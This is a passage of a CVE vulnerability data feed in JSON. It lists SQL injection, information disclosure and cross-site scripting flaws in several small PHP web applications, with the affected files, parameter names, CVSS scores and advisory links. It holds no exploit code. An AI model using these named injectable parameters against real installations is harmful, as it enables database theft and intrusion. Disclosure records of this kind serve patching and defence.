"name" : "https://vuldb.com/?ctiid.250576", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250576", "name" : "https://vuldb.com/?id.250576", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250576", "name" : "https://vuldb.com/?id.250576", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in code-projects Human Resource Integrated System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin_route/dec_service_credits.php. The manipulation of the argument date leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250576." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:human_resource_integrated_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-12T21:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0472", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/yingqian1984/FirePunch/blob/main/7-Dormitory%20Management%20System%20has%20Database%20information%20leakage%20modifyuser.php.pdf", "name" : "https://github.com/yingqian1984/FirePunch/blob/main/7-Dormitory%20Management%20System%20has%20Database%20information%20leakage%20modifyuser.php.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/yingqian1984/FirePunch/blob/main/7-Dormitory%20Management%20System%20has%20Database%20information%20leakage%20modifyuser.php.pdf", "name" : "https://github.com/yingqian1984/FirePunch/blob/main/7-Dormitory%20Management%20System%20has%20Database%20information%20leakage%20modifyuser.php.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250577", "name" : "https://vuldb.com/?ctiid.250577", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250577", "name" : "https://vuldb.com/?ctiid.250577", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250577", "name" : "https://vuldb.com/?id.250577", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250577", "name" : "https://vuldb.com/?id.250577", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in code-projects Dormitory Management System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file modifyuser.php. The manipulation of the argument mname leads to information disclosure. The exploit has been disclosed to the public and may be used. The identifier VDB-250577 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:dormitory_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-12T22:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0473", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/yingqian1984/FirePunch/blob/main/7-Dormitory%20Management%20System%20has%20SQL%20injection%20vulnerabilities%20comment.php.pdf", "name" : "https://github.com/yingqian1984/FirePunch/blob/main/7-Dormitory%20Management%20System%20has%20SQL%20injection%20vulnerabilities%20comment.php.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/yingqian1984/FirePunch/blob/main/7-Dormitory%20Management%20System%20has%20SQL%20injection%20vulnerabilities%20comment.php.pdf", "name" : "https://github.com/yingqian1984/FirePunch/blob/main/7-Dormitory%20Management%20System%20has%20SQL%20injection%20vulnerabilities%20comment.php.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250578", "name" : "https://vuldb.com/?ctiid.250578", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250578", "name" : "https://vuldb.com/?ctiid.250578", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250578", "name" : "https://vuldb.com/?id.250578", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250578", "name" : "https://vuldb.com/?id.250578", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical has been found in code-projects Dormitory Management System 1.0. Affected is an unknown function of the file comment.php. The manipulation of the argument com leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250578 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:dormitory_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-12T22:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0474", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/yingqian1984/FirePunch/blob/main/7-Dormitory%20Management%20System%20has%20SQL%20injection%20vulnerabilities%20login.php.pdf", "name" : "https://github.com/yingqian1984/FirePunch/blob/main/7-Dormitory%20Management%20System%20has%20SQL%20injection%20vulnerabilities%20login.php.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/yingqian1984/FirePunch/blob/main/7-Dormitory%20Management%20System%20has%20SQL%20injection%20vulnerabilities%20login.php.pdf", "name" : "https://github.com/yingqian1984/FirePunch/blob/main/7-Dormitory%20Management%20System%20has%20SQL%20injection%20vulnerabilities%20login.php.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250579", "name" : "https://vuldb.com/?ctiid.250579", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250579", "name" : "https://vuldb.com/?ctiid.250579", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250579", "name" : "https://vuldb.com/?id.250579", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250579", "name" : "https://vuldb.com/?id.250579", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in code-projects Dormitory Management System 1.0. Affected by this vulnerability is an unknown functionality of the file login.php. The manipulation of the argument username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250579." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:dormitory_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-12T23:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0475", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/yingqian1984/FirePunch/blob/main/7-Dormitory%20Management%20System%20has%20SQL%20injection%20vulnerabilities%20modifyuser.php.pdf", "name" : "https://github.com/yingqian1984/FirePunch/blob/main/7-Dormitory%20Management%20System%20has%20SQL%20injection%20vulnerabilities%20modifyuser.php.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/yingqian1984/FirePunch/blob/main/7-Dormitory%20Management%20System%20has%20SQL%20injection%20vulnerabilities%20modifyuser.php.pdf", "name" : "https://github.com/yingqian1984/FirePunch/blob/main/7-Dormitory%20Management%20System%20has%20SQL%20injection%20vulnerabilities%20modifyuser.php.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250580", "name" : "https://vuldb.com/?ctiid.250580", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250580", "name" : "https://vuldb.com/?ctiid.250580", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250580", "name" : "https://vuldb.com/?id.250580", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250580", "name" : "https://vuldb.com/?id.250580", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in code-projects Dormitory Management System 1.0. Affected by this issue is some unknown functionality of the file modifyuser.php. The manipulation of the argument user_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250580." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:dormitory_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-13T00:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0476", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://drive.google.com/file/d/1Hvv_oKuEplp4DTcOf9xImgyPt58a8jGz/view?usp=sharing", "name" : "https://drive.google.com/file/d/1Hvv_oKuEplp4DTcOf9xImgyPt58a8jGz/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://drive.google.com/file/d/1Hvv_oKuEplp4DTcOf9xImgyPt58a8jGz/view?usp=sharing", "name" : "https://drive.google.com/file/d/1Hvv_oKuEplp4DTcOf9xImgyPt58a8jGz/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250581", "name" : "https://vuldb.com/?ctiid.250581", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250581", "name" : "https://vuldb.com/?ctiid.250581", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250581", "name" : "https://vuldb.com/?id.250581", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250581", "name" : "https://vuldb.com/?id.250581", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as problematic, was found in Blood Bank & Donor Management 1.0. This affects an unknown part of the file request-received-bydonar.php. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250581 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:phpgurukul:blood_bank_\\&_donor_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-13T06:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0477", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL5.pdf", "name" : "https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL5.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL5.pdf", "name" : "https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL5.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250582", "name" : "https://vuldb.com/?ctiid.250582", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250582", "name" : "https://vuldb.com/?ctiid.250582", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250582", "name" : "https://vuldb.com/?id.250582", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250582", "name" : "https://vuldb.com/?id.250582", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in code-projects Fighting Cock Information System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/action/update-deworm.php. The manipulation of the argument usage_deworm leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250582 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:fighting_cock_information_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-13T06:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0478", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL8.pdf", "name" : "https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL8.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL8.pdf", "name" : "https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL8.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250583", "name" : "https://vuldb.com/?ctiid.250583", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250583", "name" : "https://vuldb.com/?ctiid.250583", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250583", "name" : "https://vuldb.com/?id.250583", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250583", "name" : "https://vuldb.com/?id.250583", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in code-projects Fighting Cock Information System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/pages/edit_chicken.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250583." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:fighting_cock_information_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-13T07:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0479", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/Np0ZdyKEnVOV", "name" : "https://note.zhaoj.in/share/Np0ZdyKEnVOV", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://note.zhaoj.in/share/Np0ZdyKEnVOV", "name" : "https://note.zhaoj.in/share/Np0ZdyKEnVOV", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250584", "name" : "https://vuldb.com/?ctiid.250584", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250584", "name" : "https://vuldb.com/?ctiid.250584", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250584", "name" : "https://vuldb.com/?id.250584", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250584", "name" : "https://vuldb.com/?id.250584", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Taokeyun up to 1.0.5. It has been classified as critical. Affected is the function login of the file application/index/controller/m/User.php of the component HTTP POST Request Handler. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250584." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:jifeer:taokeyun:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.0.5", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-13T07:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0480", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/0KtyJccrP3Ba", "name" : "https://note.zhaoj.in/share/0KtyJccrP3Ba", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://note.zhaoj.in/share/0KtyJccrP3Ba", "name" : "https://note.zhaoj.in/share/0KtyJccrP3Ba", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250585", "name" : "https://vuldb.com/?ctiid.250585", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250585", "name" : "https://vuldb.com/?ctiid.250585", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250585", "name" : "https://vuldb.com/?id.250585", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250585", "name" : "https://vuldb.com/?id.250585", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Taokeyun up to 1.0.5. It has been declared as critical. Affected by this vulnerability is the function index of the file application/index/controller/m/Drs.php of the component HTTP POST Request Handler. The manipulation of the argument cid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250585 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:jifeer:taokeyun:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.0.5", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-13T08:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0481", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/TKWDqowIoLqs", "name" : "https://note.zhaoj.in/share/TKWDqowIoLqs", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://note.zhaoj.in/share/TKWDqowIoLqs", "name" : "https://note.zhaoj.in/share/TKWDqowIoLqs", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250586", "name" : "https://vuldb.com/?ctiid.250586", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250586", "name" : "https://vuldb.com/?ctiid.250586", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250586", "name" : "https://vuldb.com/?id.250586", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250586", "name" : "https://vuldb.com/?id.250586", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Taokeyun up to 1.0.5. It has been rated as critical. Affected by this issue is the function shopGoods of the file application/index/controller/app/store/Goods.php of the component HTTP POST Request Handler. The manipulation of the argument keyword leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250586 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:jifeer:taokeyun:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.0.5", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-13T09:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0482", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/MuWxURhTIYTP", "name" : "https://note.zhaoj.in/share/MuWxURhTIYTP", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://note.zhaoj.in/share/MuWxURhTIYTP", "name" : 